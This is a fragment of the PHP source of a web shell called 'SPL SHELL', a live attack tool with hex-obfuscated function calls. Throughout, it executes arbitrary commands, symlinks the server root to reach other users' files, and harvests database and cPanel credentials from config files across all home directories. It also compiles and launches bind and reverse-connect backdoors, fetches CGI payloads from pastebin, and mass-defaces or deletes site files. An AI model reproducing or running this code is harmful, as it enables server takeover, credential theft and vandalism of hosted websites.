= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } $freespace = hdd(disk_free_space("/")); $total = hdd(disk_total_space("/")); $used = $total - $freespace; function path() { if(isset($_GET['dir'])) { $dir = str_replace("\\", "/", $_GET['dir']); @chdir($dir); } else { $dir = str_replace("\\", "/", getcwd()); } return $dir; } $dir = scandir(path()); foreach($dir as $folder) { $dirinfo['path'] = path().DIRECTORY_SEPARATOR.$folder; if(!is_dir($dirinfo['path'])) continue; $dirinfo['link'] = ($folder === ".." ? "$folder" : ($folder === "." ? "$folder" : "$folder")); if(function_exists('posix_getpwuid')) { $dirinfo['owner'] = (object) @posix_getpwuid(fileowner($dirinfo['path'])); $dirinfo['owner'] = $dirinfo['owner']->name; } else { $dirinfo['owner'] = fileowner($dirinfo['path']); } if(function_exists('posix_getgrgid')) { $dirinfo['group'] = (object) @posix_getgrgid(filegroup($dirinfo['path'])); $dirinfo['group'] = $dirinfo['group']->name; } else { $dirinfo['group'] = filegroup($dirinfo['path']); } } function OS() { return (substr(strtoupper(PHP_OS), 0, 3) === "WIN") ? "Windows" : "Linux"; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function windisk() { $letters = ""; $v = explode("\\", path()); $v = $v[0]; foreach(range("A", "Z") as $letter) { $bool = $isdiskette = in_array($letter, array("A")); if(!$bool) $bool = is_dir("$letter:\\"); if($bool) { $letters .= "[ "; if($letter.":" != $v) { $letters .= $letter; } else { $letters .= color(1, 2, $letter); } $letters .= " ]"; } } if(!empty($letters)) { print "Detected Drives $letters
"; } if(count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $v = realpath(path(). ".."); if(empty($v)) { $a = explode(DIRECTORY_SEPARATOR,path()); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR, $a); } print "".$item[0].""; } } } ini_set('display_errors', FALSE); $Array = [ '7068705f756e616d65', '70687076657273696f6e', '6368646972', '676574637764', '707265675f73706c6974', '636f7079', '66696c655f6765745f636f6e74656e7473', '6261736536345f6465636f6465', '69735f646972', '6f625f656e645f636c65616e28293b', '756e6c696e6b', '6d6b646972', '63686d6f64', '7363616e646972', '7374725f7265706c616365', '68746d6c7370656369616c6368617273', '7661725f64756d70', '666f70656e', '667772697465', '66636c6f7365', '64617465', '66696c656d74696d65', '737562737472', '737072696e7466', '66696c657065726d73', '746f756368', '66696c655f657869737473', '72656e616d65', '69735f6172726179', '69735f6f626a656374', '737472706f73', '69735f7772697461626c65', '69735f7265616461626c65', '737472746f74696d65', '66696c6573697a65', '726d646972', '6f625f6765745f636c65616e', '7265616466696c65', '617373657274', ]; $___ = count($Array); for($i=0;$i<$___;$i++) { $GNJ[] = uhex($Array[$i]); } ?> SPL SHELL


SPL SHELL
 
$.notify("', '", { className:"1",autoHideDelay: 2000,position:"left bottom" });' ]; $f = $o_[0].'Success!'.$o_[1]; $g = $o_[0].'Failed!'.$o_[1]; if(isset($_FILES["n"])) { $z = $_FILES["n"]["name"]; $r = count($z); for( $i=0 ; $i < $r ; $i++ ) { if($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) { echo $f; } else { echo $g; } } } ?>
Current Directory : "; foreach ($k as $m => $l) { if($l=='' && $m==0) { echo '/'; } if($l == '') { continue; } echo ''.$l.'/'; } echo ' ('.x("$d/$c").')'; print "
"; print (OS() === "Windows") ? windisk() : ""; echo "

"; echo '+NEWFILE+ +NEWDIR+'; echo "
".$user."@".gethostbyname($_SERVER['HTTP_HOST']).": ~ $  
"; if($_POST['do_cmd']) { echo "
".exe($_POST['cmd'])."
"; } $a_ = '
'; $b_ = '
'; $c_ = '
'; $d_ = '

'; if(isset($_GET["s"])) { echo $a_.uhex($_GET["s"]).$b_.'

'.$c_; } elseif(isset($_GET["y"])) { echo $a_.'REQUEST'.$b_.'
   '.$d_.'
'.$c_; } elseif(isset($_GET["e"])) { echo $a_.uhex($_GET["e"]).$b_.'

BASE64 :
'.$d_.' '.$c_.' '; if(isset($_POST["e"])) { if($_POST["b64"] == "1") { $ex = $GNJ[7]($_POST["e"]); } else { $ex = $_POST["e"]; } $fp = $GNJ[17](uhex($_GET["e"]), 'w'); if($GNJ[18]($fp, $ex)) { OK(); } else { ER(); } $GNJ[19]($fp); } } elseif(isset($_GET["x"])) { rec(uhex($_GET["x"])); if($GNJ[26](uhex($_GET["x"]))) { ER(); } else { OK(); } } elseif(isset($_GET["t"])) { echo $a_.uhex($_GET["t"]).$b_.' '.$d_.' '.$c_; if( !empty($_POST["t"]) ) { $p = $GNJ[33]($_POST["t"]); if($p) { if(!$GNJ[25](uhex($_GET["t"]),$p,$p)) { ER(); } else { OK(); } } else { ER(); } } } elseif(isset($_GET["k"])) { echo $a_.uhex($_GET["k"]).$b_.' '.$d_.' '.$c_; if(!empty($_POST["b"])) { $x = $_POST["b"]; $t = 0; for($i=strlen($x)-1;$i>=0;--$i) $t += (int)$x[$i]*pow(8, (strlen($x)-$i-1)); if(!$GNJ[12](uhex($_GET["k"]), $t)) { ER(); } else { OK(); } } } elseif(isset($_GET["l"])) { echo $a_.'+DIR'.$b_.' '.$d_.' '.$c_; if(isset($_POST["l"])) { if(!$GNJ[11]($_POST["l"])) { ER(); } else { OK(); } } } elseif(isset($_GET["q"])) { if($GNJ[10](__FILE__)) { $GNJ[38]($GNJ[9]); header("Location: ".basename($_SERVER['PHP_SELF']).""); exit(); } else { echo $g; } } elseif (isset($_GET[hex('info')])) { echo '
SYSTEM INFORMATION
'; } elseif (isset($_GET[hex('mass')])) { echo "

Mass Tools SPL SHELL


Mass Deface / Delete Files
Mass User Changer
Mass Title Changer

"; } elseif (isset($_GET[hex('symlink')])) { echo "

"; echo "

Symlink SPL SHELL




"; if(isset($_POST['symlink'])) { @set_time_limit(0); echo "

Symlink SPL SHELL



"; @mkdir('sym',0777); $htaccess = "Options all n DirectoryIndex Sux.html n AddType text/plain .php n AddHandler server-parsed .php n AddType text/plain .html n AddHandler txt .html n Require None n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo "

"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '.ir'; $israel = '.il'; $indo = '.id'; $sg12 = '.sg'; $edu = '.edu'; $gov = '.gov'; $gose = '.go'; $gober = '.gob'; $mil1 = '.mil'; $mil2 = '.mi'; $malay = '.my'; $china = '.cn'; $japan = '.jp'; $austr = '.au'; $porn = '.xxx'; $as = '.uk'; $calfn = '.ca'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]) or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0]) or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0])) { $name = "
".$string[1][0].'
'; } echo " "; flush(); } } } } echo "
DomainsUserssymlink
'.$name.'
'.$UID['name']." Symlink
"; } elseif (isset($_POST['symlink2'])) { $dir = path(); $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); $d0mains = @file("/etc/named.conf"); ##httaces if($d0mains){ @mkdir("Exc_sym",0777); @chdir("Exc_sym"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex Exc.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo " "; $dcount = 1; foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo ""; flush(); $dcount++;}}} echo "
S. No. Domains Users Symlink
" . $dcount . " ".$domains[1][0]." ".$user['name']." Symlink
"; }else{ $TEST=@file('/etc/passwd'); if ($TEST){ @mkdir("Exc_sym",0777); @chdir("Exc_sym"); exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex Exc.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); @fclose($fp3); echo " "; $dcount = 1; $file = fopen("/etc/passwd", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++;}fclose($file); echo "
S. No. Users Symlink
" . $dcount . " " . $matches . "Symlink
";}else{if($os != "Windows"){@mkdir("Exc_sym",0777);@chdir("Exc_sym");@exe("ln -s / root");$file3 = ' Options Indexes FollowSymLinks DirectoryIndex Exc.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any '; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "

Symlink2 SPL SHELL

"; $temp = "";$val1 = 0;$val2 = 1000; for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1); if ($uid)$temp .= join(':',$uid)."\n";} echo '
';$temp = trim($temp);$file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)){$s = fgets($file);$matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++;} fclose($file); echo "
ID Users Symlink
" . $dcount . " " . $matches . "Symlink
";unlink("test.txt"); } else echo "
Cannot create Symlink
"; } } } elseif (isset($_POST['symlink_py'])) { $sym_dir = mkdir('ia_sympy', 0755); chdir('ia_sympy'); $file_sym = "sym.py"; $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdicnVkdWxzeW1weScpDQpvcy5jaGRpcignYnJ1ZHVsc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGJydWR1bC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxNzxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBDb243ZXh0PC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJicnVkdWwucGh0bWwiLCJ3IikNCmlwcy53cml0ZShzZikNCg0KZm9yIGZ1c3IgaW4gc3VzcjoNCglmb3IgZnNpdGUgaW4gc2l0ZXg6DQoJCWZ1PWZ1c3JbMDo1XQ0KCQlzPWZzaXRlWzA6NV0NCgkJaWYgZnU9PXM6DQoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9YnJ1ZHVsLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx"; $sym = fopen($file_sym, "w"); fwrite($sym, base64_decode($sym_script)); chmod($file_sym, 0755); $jancok = exe("python sym.py"); echo "
Done ... Klik Here"; } } elseif (isset($_GET[hex('config')])) { $dir = path(); if($_POST){ $passwd = $_POST['passwd']; mkdir("Exc_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("Exc_config/.htaccess","w"); fwrite($htc, $isi_htc); preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_Exc) { $user_config_dir = "/home/$user_Exc/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_Exc/.my.cnf" => "cpanel", "/home/$user_Exc/.accesshash" => "WHM-accesshash", "/home/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_Exc/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_Exc/public_html/whm/configuration.php" => "WHMCS", "/home/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_Exc/public_html/forum/config.php" => "phpBB", "/home/$user_Exc/public_html/sites/default/settings.php" => "Drupal", "/home/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_Exc/public_html/app/etc/local.xml" => "Magento", "/home/$user_Exc/public_html/joomla/configuration.php" => "Joomla", "/home/$user_Exc/public_html/configuration.php" => "Joomla", "/home/$user_Exc/public_html/wp/wp-config.php" => "WordPress", "/home/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_Exc/public_html/wp-config.php" => "WordPress", "/home/$user_Exc/public_html/admin/config.php" => "OpenCart", "/home/$user_Exc/public_html/slconfig.php" => "Sitelok", "/home/$user_Exc/public_html/application/config/database.php" => "Ellislab", "/home1/$user_Exc/.my.cnf" => "cpanel", "/home1/$user_Exc/.accesshash" => "WHM-accesshash", "/home1/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb", "/home1/$user_Exc/public_html/config/koneksi.php" => "Lokomedia", "/home1/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home1/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS", "/home1/$user_Exc/public_html/whm/configuration.php" => "WHMCS", "/home1/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS", "/home1/$user_Exc/public_html/forum/config.php" => "phpBB", "/home1/$user_Exc/public_html/sites/default/settings.php" => "Drupal", "/home1/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop", "/home1/$user_Exc/public_html/app/etc/local.xml" => "Magento", "/home1/$user_Exc/public_html/joomla/configuration.php" => "Joomla", "/home1/$user_Exc/public_html/configuration.php" => "Joomla", "/home1/$user_Exc/public_html/wp/wp-config.php" => "WordPress", "/home1/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress", "/home1/$user_Exc/public_html/wp-config.php" => "WordPress", "/home1/$user_Exc/public_html/admin/config.php" => "OpenCart", "/home1/$user_Exc/public_html/slconfig.php" => "Sitelok", "/home1/$user_Exc/public_html/application/config/database.php" => "Ellislab", "/home2/$user_Exc/.my.cnf" => "cpanel", "/home2/$user_Exc/.accesshash" => "WHM-accesshash", "/home2/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb", "/home2/$user_Exc/public_html/config/koneksi.php" => "Lokomedia", "/home2/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home2/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS", "/home2/$user_Exc/public_html/whm/configuration.php" => "WHMCS", "/home2/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS", "/home2/$user_Exc/public_html/forum/config.php" => "phpBB", "/home2/$user_Exc/public_html/sites/default/settings.php" => "Drupal", "/home2/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop", "/home2/$user_Exc/public_html/app/etc/local.xml" => "Magento", "/home2/$user_Exc/public_html/joomla/configuration.php" => "Joomla", "/home2/$user_Exc/public_html/configuration.php" => "Joomla", "/home2/$user_Exc/public_html/wp/wp-config.php" => "WordPress", "/home2/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress", "/home2/$user_Exc/public_html/wp-config.php" => "WordPress", "/home2/$user_Exc/public_html/admin/config.php" => "OpenCart", "/home2/$user_Exc/public_html/slconfig.php" => "Sitelok", "/home2/$user_Exc/public_html/application/config/database.php" => "Ellislab", "/home3/$user_Exc/.my.cnf" => "cpanel", "/home3/$user_Exc/.accesshash" => "WHM-accesshash", "/home3/$user_Exc/public_html/bw-configs/config.ini" => "BosWeb", "/home3/$user_Exc/public_html/config/koneksi.php" => "Lokomedia", "/home3/$user_Exc/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home3/$user_Exc/public_html/clientarea/configuration.php" => "WHMCS", "/home3/$user_Exc/public_html/whm/configuration.php" => "WHMCS", "/home3/$user_Exc/public_html/whmcs/configuration.php" => "WHMCS", "/home3/$user_Exc/public_html/forum/config.php" => "phpBB", "/home3/$user_Exc/public_html/sites/default/settings.php" => "Drupal", "/home3/$user_Exc/public_html/config/settings.inc.php" => "PrestaShop", "/home3/$user_Exc/public_html/app/etc/local.xml" => "Magento", "/home3/$user_Exc/public_html/joomla/configuration.php" => "Joomla", "/home3/$user_Exc/public_html/configuration.php" => "Joomla", "/home3/$user_Exc/public_html/wp/wp-config.php" => "WordPress", "/home3/$user_Exc/public_html/wordpress/wp-config.php" => "WordPress", "/home3/$user_Exc/public_html/wp-config.php" => "WordPress", "/home3/$user_Exc/public_html/admin/config.php" => "OpenCart", "/home3/$user_Exc/public_html/slconfig.php" => "Sitelok", "/home3/$user_Exc/public_html/application/config/database.php" => "Ellislab" ); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("Exc_config/$user_Exc-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } echo "
Done
"; }else{ $baru = hex($dir); $baru2 = hex('bypass-passwd'); echo "

"; echo "

Config Grabber SPL SHELL

"; echo "
etc/passwd ( Error ? Bypass Here )

\n"; echo "
"; } } elseif (isset($_GET[hex('network')])) { $dir = path(); // bind connect with c if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "

Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.

"; } } // bind connect with perl elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "

Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.

"; } } // back connect with c elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } // back connect with perl elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

Netsploit SPL SHELL

Port BindingConnect BackLoad and Exploit
Port


Pass
IP


Port




">
url


cmd


"; echo "

CGI SPL SHELL




"; if (isset($_POST['cgi'])) { $cgi_dir = mkdir('ia_cgi', 0755); chdir('ia_cgi'); $file_cgi = "cgi.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker \n AddHandler cgi-script .Index_Attacker"; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/Lj46KxFT"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); chmod($memeg, 0755); fclose($cgi); ob_flush(); flush(); echo "
Done ... Klik Here"; } elseif (isset($_POST['cgi2'])) { $cgi_dir = mkdir('ia_cgi', 0755); chdir('ia_cgi'); $file_cgi = "cgi2.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker "; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/ZPZMC6K4"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); chmod($memeg, 0755); echo "
Done ... Klik Here"; } elseif (isset($_POST['cgipy'])) { $cgi_dir = mkdir('ia_cgi', 0755); chdir('ia_cgi'); $file_cgi = "cgipy.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .Index_Attacker \n AddHandler cgi-script .Index_Attacker \n AddHandler cgi-script .Index_Attacker"; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/MYyXAXyY"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); chmod($memeg, 0755); echo "
Done ... Klik Here"; } } elseif(isset($_GET[hex('mass_tool')])) { $dir = path(); echo "
\n"; $dirr=$_POST['d_dir']; $index = $_POST["script"]; $index = str_replace('"',"'",$index); $index = stripslashes($index); function edit_file($file,$index){ if (is_writable($file)) { clear_fill($file,$index); echo " [+] Nyabun 100% Successfull
"; } else { echo " [-] Ternyata Tidak Boleh Menyabun Disini :(
"; } } function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "DELETED $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } function clear_fill($file,$index){ if(file_exists($file)){ $handle = fopen($file,'w'); fwrite($handle,''); fwrite($handle,$index); fclose($handle); } } function gass(){ global $dirr , $index ; chdir($dirr); $me = str_replace(dirname(__FILE__).'/','',__FILE__); $files = scandir($dirr) ; $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..","."); sort($files); $n = 0 ; foreach ($files as $file){ if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) { echo "
$dirr/$file ====> "; edit_file($file,$index); flush(); $n = $n +1 ; } } echo "
"; echo "

$n Kali Anda Telah Ngecrot Disini


"; } function ListFiles($dirrall) { if($dh = opendir($dirrall)) { $files = Array(); $inner_files = Array(); $me = str_replace(dirname(__FILE__).'/','',__FILE__); $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db"); while($file = readdir($dh)) { if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) { if(is_dir($dirrall . "/" . $file)) { $inner_files = ListFiles($dirrall . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dirrall . "/" . $file); } } } closedir($dh); return $files; } } function gass_all(){ global $index ; $dirrall=$_POST['d_dir']; foreach (ListFiles($dirrall) as $key=>$file){ $file = str_replace('//',"/",$file); echo "
$file ===>"; edit_file($file,$index); flush(); } $key = $key+1; echo "

$key Kali Anda Telah Ngecrot Disini


